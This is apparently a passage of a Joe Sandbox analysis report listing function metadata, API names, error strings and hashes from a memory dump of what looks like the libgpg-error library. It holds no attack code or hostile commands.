                                                            Function 6E240E2C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_dgettextmemcpystrlen
                                                            • String ID: Success$libgpg-error
                                                            • API String ID: 136027815-2258219154
                                                            • Opcode ID: f833e4fd3dee7b674d5841210749729df3ccbc68f0497ac9dc3bf1f1c4f7b48b
                                                            • Instruction ID: 9ec932a6934dfb5fd1b632ce510162de6372a3a8315b3c43a4d321d948ea7943
                                                            • Opcode Fuzzy Hash: f833e4fd3dee7b674d5841210749729df3ccbc68f0497ac9dc3bf1f1c4f7b48b
                                                            • Instruction Fuzzy Hash: 6BF0A7B6A18318CFC3005FD8DAC0559F7E6BB94715F258C3DD98897300E23598558BC2
                                                            Function 6E240E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_dgettextmemcpystrlen
                                                            • String ID: Success$libgpg-error
                                                            • API String ID: 136027815-2258219154
                                                            • Opcode ID: 1c59d31fca0014d80959df147f019e90e418c82d6e846e3bbfdc0f241dd685a8
                                                            • Instruction ID: 47258c6c8673ce714ce778d89a8855feeec658c7e61c8df6731a434f8300da9f
                                                            • Opcode Fuzzy Hash: 1c59d31fca0014d80959df147f019e90e418c82d6e846e3bbfdc0f241dd685a8
                                                            • Instruction Fuzzy Hash: CAF082B6A183148BC3405FD8DA80559F7E6AB94615F258C3DD94897300E635D8558BC2
                                                            Function 6E240E0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_dgettextmemcpystrlen
                                                            • String ID: Success$libgpg-error
                                                            • API String ID: 136027815-2258219154
                                                            • Opcode ID: dbd7fc58106d4e1dedae565eeff82acae7f91e8292a6e04dff2b881d7dd8289c
                                                            • Instruction ID: 6dc1782bec2b09b6d56b6f7e034074a0001ae1f37064b6badd2a1ddc11cd1fbf
                                                            • Opcode Fuzzy Hash: dbd7fc58106d4e1dedae565eeff82acae7f91e8292a6e04dff2b881d7dd8289c
                                                            • Instruction Fuzzy Hash: D5F082B6A183188BC7405FD8DA84559F7E6AB94615F218C3DD94897300E23598558BC2
                                                            Function 6E240E1C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_dgettextmemcpystrlen
                                                            • String ID: Success$libgpg-error
                                                            • API String ID: 136027815-2258219154
                                                            • Opcode ID: 0dd3a697e8137c44d3ed9c2e6f2ebc70116b1d4bc8274cd3af5f45293fbd5468
                                                            • Instruction ID: 97c7c4fcd23bc395640ceefdd7db959c965210437374c4d04ba30ec5f5d71780
                                                            • Opcode Fuzzy Hash: 0dd3a697e8137c44d3ed9c2e6f2ebc70116b1d4bc8274cd3af5f45293fbd5468
                                                            • Instruction Fuzzy Hash: FBF0A7B6A18314CFC3005FD8DA80549F7E6BB94715F218C3DD94897300E23598558BC2
                                                            Function 6E240E6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_dgettextmemcpystrlen
                                                            • String ID: Success$libgpg-error
                                                            • API String ID: 136027815-2258219154
                                                            • Opcode ID: a937e24c7814195e700a878361b42c9b101097d4f83d845974089cb7a40e938b
                                                            • Instruction ID: 1fa5b82aab28ad97374d04738ccab7d0b359c59d216a7fef696b12ebba08cf1b
                                                            • Opcode Fuzzy Hash: a937e24c7814195e700a878361b42c9b101097d4f83d845974089cb7a40e938b
                                                            • Instruction Fuzzy Hash: EAF0A7B6A18314DFC3005FD8DAC4559F7E6BB95715F258C3DD94897300E23598558BC2
                                                            Function 6E240E7C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_dgettextmemcpystrlen
                                                            • String ID: Success$libgpg-error
                                                            • API String ID: 136027815-2258219154
                                                            • Opcode ID: 67ead66d8971609b24d413a34b3a6e9b1d0a4b73c8c1ec21f6d4762dfccec770
                                                            • Instruction ID: 0620bbda3e2d791e1e8af3ebdb5d1bbfc2ee584d67bd8c05ddcc30c0f5419f3d
                                                            • Opcode Fuzzy Hash: 67ead66d8971609b24d413a34b3a6e9b1d0a4b73c8c1ec21f6d4762dfccec770
                                                            • Instruction Fuzzy Hash: 39F0A7B6A18314CFC3405FE8DAC0559F7E6BB94719F258C3DD94897300E23598558BC2
                                                            Function 6E240E4C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_dgettextmemcpystrlen
                                                            • String ID: Success$libgpg-error
                                                            • API String ID: 136027815-2258219154
                                                            • Opcode ID: e16be703ea5ac4aa73f7c661e3d6bc59427a03ffe1d318872b1d396659d3bd4d
                                                            • Instruction ID: 8675bab67d2ff57d1d9a8428d90b22ebbaf6d53702f963c2e1234800c4e8d654
                                                            • Opcode Fuzzy Hash: e16be703ea5ac4aa73f7c661e3d6bc59427a03ffe1d318872b1d396659d3bd4d
                                                            • Instruction Fuzzy Hash: 38F0A7B6A18314CFC3005FE8DAC0559F7E6BB94719F258C3DD94897300E23598558BC2
                                                            Function 6E240E5C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_dgettextmemcpystrlen
                                                            • String ID: Success$libgpg-error
                                                            • API String ID: 136027815-2258219154
                                                            • Opcode ID: 1d860c2d131fd3a5f4595d3cf135703d6392bda141692c0f4ed69163faf5ca05
                                                            • Instruction ID: 24873dc35737dccb0948eef1098589872a4c28115d57610a5db11f0d52368e65
                                                            • Opcode Fuzzy Hash: 1d860c2d131fd3a5f4595d3cf135703d6392bda141692c0f4ed69163faf5ca05
                                                            • Instruction Fuzzy Hash: E2F0A7B6A18314CFC3005FE8DAC0559F7E6BB94719F258C3DD94897300E23598558BC2
                                                            Function 6E239613 Relevance: 7.5, APIs: 5, Instructions: 46fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _errno$ErrorFileLastRead
                                                            • String ID:
                                                            • API String ID: 2044071692-0
                                                            • Opcode ID: bcf341b4f09273abdbc0e7b4a78fcc8d348c9aba45cbbcf68a7e2d069e1330a4
                                                            • Instruction ID: 40ac7c3665f26865f85a267f29bdc1495f7946be8d30deec877b414db1380e3d
                                                            • Opcode Fuzzy Hash: bcf341b4f09273abdbc0e7b4a78fcc8d348c9aba45cbbcf68a7e2d069e1330a4
                                                            • Instruction Fuzzy Hash: A2016DB06097128FC7409F78D8C401AB7F1BF8A325F208A2DE4A9872A4DB30D820CF52
                                                            Function 6E244EB0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 44stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 6E237220: malloc.MSVCRT ref: 6E23724F
                                                              • Part of subcall function 6E237220: memset.MSVCRT ref: 6E237269
                                                            • strncmp.MSVCRT ref: 6E244EF6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: mallocmemsetstrncmp
                                                            • String ID: $$$PGP
                                                            • API String ID: 2386774029-819431215
                                                            • Opcode ID: 7c080300707cb54a049c014928585115a6db489a22f87a7b2cdd2d5ca5c1b7ca
                                                            • Instruction ID: 7dd1e43b6930e70e68a0fa15b4d40b9170c5a586d8b7207a4fcde412c3556a2d
                                                            • Opcode Fuzzy Hash: 7c080300707cb54a049c014928585115a6db489a22f87a7b2cdd2d5ca5c1b7ca
                                                            • Instruction Fuzzy Hash: F201B1F250971BCBEB55AFA5E88024BBBE1BF00309F12496DE8844B246D374C941CFD2
                                                            Function 6E2396A1 Relevance: 6.0, APIs: 4, Instructions: 42fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _errno$ErrorFileLastRead
                                                            • String ID:
                                                            • API String ID: 2044071692-0
                                                            • Opcode ID: 02b2a9d844bb0f2e4d7937f25115870278f948afba4fec362e10b13a6c4d809e
                                                            • Instruction ID: 024ad5d2bb9a1c8809839630176d22939995c54da2ba40f1fb4b4e168f544c13
                                                            • Opcode Fuzzy Hash: 02b2a9d844bb0f2e4d7937f25115870278f948afba4fec362e10b13a6c4d809e
                                                            • Instruction Fuzzy Hash: 48015EB16097158FC7409F7DD89451AB7F1BF86314F208A2DE4A9C72A4DB30D820CF52
                                                            Function 6E242E63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _getpidstrlen$localtimetime
                                                            • String ID: [%u]
                                                            • API String ID: 2564112469-1146909518
                                                            • Opcode ID: 671a37ace7c05b9b18a923cc6ec9be4e2732a388f634b28225b7e047032bf489
                                                            • Instruction ID: c0cfaf14ee33056ca3231a4aa554da2ecc9fcf3056ce8f4b4babb52fbd9752dd
                                                            • Opcode Fuzzy Hash: 671a37ace7c05b9b18a923cc6ec9be4e2732a388f634b28225b7e047032bf489
                                                            • Instruction Fuzzy Hash: 93112CB160470ACFD784DFA5C495A2A77F7BB47704F61C918D8D487210E770E452CB61
                                                            Function 6E2376B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: fputcstrerrorstrlen
                                                            • String ID: errno=%s
                                                            • API String ID: 3318081027-2313551297
                                                            • Opcode ID: 392ef233cbb68a705eff29b75de9b85dc57db3a2b7208da5ed3b31e0b78f21b3
                                                            • Instruction ID: ab3159733c37d8de522afa48ad7c2c87b00c6bb126374e99bc70faa805066a23
                                                            • Opcode Fuzzy Hash: 392ef233cbb68a705eff29b75de9b85dc57db3a2b7208da5ed3b31e0b78f21b3
                                                            • Instruction Fuzzy Hash: 63E039F5809B558FCB909FA8999465ABBE2AB06318F318809C48447280D3308480CF42
                                                            Function 6E240EB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _errno$_gpg_w32_dgettextmemcpystrlen
                                                            • String ID: strerror failed: %i
                                                            • API String ID: 3052257591-3251084447
                                                            • Opcode ID: ae565f1a15da14c4ecd18cee2038c778f0c2a61049ac2467137ea84614740605
                                                            • Instruction ID: 57db84988e0519cd71b99195d59ecbd659455de4151b3cf6df2f5103f6363f5e
                                                            • Opcode Fuzzy Hash: ae565f1a15da14c4ecd18cee2038c778f0c2a61049ac2467137ea84614740605
                                                            • Instruction Fuzzy Hash: 46E0E271404708DFC704AFA9C8C0A1EB7E2BF46B00F418859E59A63220D730AC908B8B